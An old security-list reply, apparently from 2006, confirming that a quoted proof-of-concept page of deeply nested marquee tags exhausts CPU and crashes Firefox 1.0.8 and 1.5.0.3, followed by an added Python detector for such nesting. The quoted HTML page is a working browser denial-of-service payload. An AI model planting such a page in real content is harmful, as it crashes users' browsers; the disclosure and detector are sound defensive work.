-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 I was able to use this proof of concept code with the following results:
With Firefox 1.0.8 (Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.13) Gecko/20060418 Fedora/1.0.8-1.1.fc4 Firefox/1.0.8) I was able to cause a resource exhaustion with firefox increasing cpu cycles and memory allocation well beyond normal utilization but without crashing. With Firefox 1.5.0.3 (Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3) Firefox causes resource exhaustion to the point of crashing the application. Josh Zlatin-Amishav wrote: > On Tue, 30 May 2006, [EMAIL PROTECTED] wrote: > >> I have found a problem which causes denial of service on fire fox browser > > > Can you give us some more details, like versions and platforms affected? > I was unable to recreate this flaw using firefox 1.5.dfsg+1.5.0 on > Debian unstable. > > -- > - Josh > >> >> Creadit:to n00b for finding this bug.. >> >> the problem lie's in the >> >> <marquee> html tag uses 100% cpu and crash's the browser.. >> >> Following proof of concept available >> >> <html> >> <head> >> <title>Credit to n00b..</title> >> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> >> </head> >> >> <body> >> 
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></mar q >> > > ue > >> e></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee> >> >> </body> >> </html> >> >> > > > -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2.1 (GNU/Linux) Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org iD8DBQFEffkxosz5/4IhOt4RAnmyAJ9a/TtfSGFlPW+wT/r6RyS3E57M3gCeIC4X /FsKrmn9RqJrINi0Z5PwvZA= =Wso3 -----END PGP SIGNATURE-----
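
A filtering proxy or mail gateway can flag pages shaped like the proof of concept quoted in this thread by measuring how deeply one element nests inside itself. This is an added example, not part of the original thread; the function names, the depth limit of 8 and the sample documents are assumptions constructed for illustration.

```python
from html.parser import HTMLParser

# Assumption: the limit is an arbitrary policy value for this example. The
# thread does not say at what nesting depth the browser starts to misbehave.
MAX_DEPTH = 8


class NestingDepth(HTMLParser):
    """Track how deeply one element is nested inside itself."""

    def __init__(self, tag):
        super().__init__(convert_charrefs=True)
        self.tag = tag.lower()
        self.depth = 0
        self.max_depth = 0

    def handle_starttag(self, tag, attrs):
        # html.parser lowercases tag names, so <MARQUEE> matches too.
        if tag == self.tag:
            self.depth += 1
            self.max_depth = max(self.max_depth, self.depth)

    def handle_endtag(self, tag):
        # Ignore stray end tags so the counter never goes negative.
        if tag == self.tag and self.depth > 0:
            self.depth -= 1


def max_nesting(html, tag="marquee"):
    """Return the deepest self-nesting of `tag` seen in the token stream."""
    parser = NestingDepth(tag)
    parser.feed(html)
    parser.close()
    return parser.max_depth


def is_suspicious(html, tag="marquee", limit=MAX_DEPTH):
    return max_nesting(html, tag) > limit


# Constructed samples (not taken from the thread).
BENIGN = "<html><body><marquee>news</marquee><marquee>more</marquee></body></html>"
NESTED = "<html><body>" + "<MARQUEE>" * 40 + "</marquee>" * 40 + "</body></html>"
UNCLOSED = "<body>" + "<marquee loop=1>" * 12  # end tags never sent

if __name__ == "__main__":
    for name, doc in (("benign", BENIGN), ("nested", NESTED), ("unclosed", UNCLOSED)):
        print(name, max_nesting(doc), is_suspicious(doc))
```

The check counts tokens rather than building a DOM, so it also catches documents that never close the element.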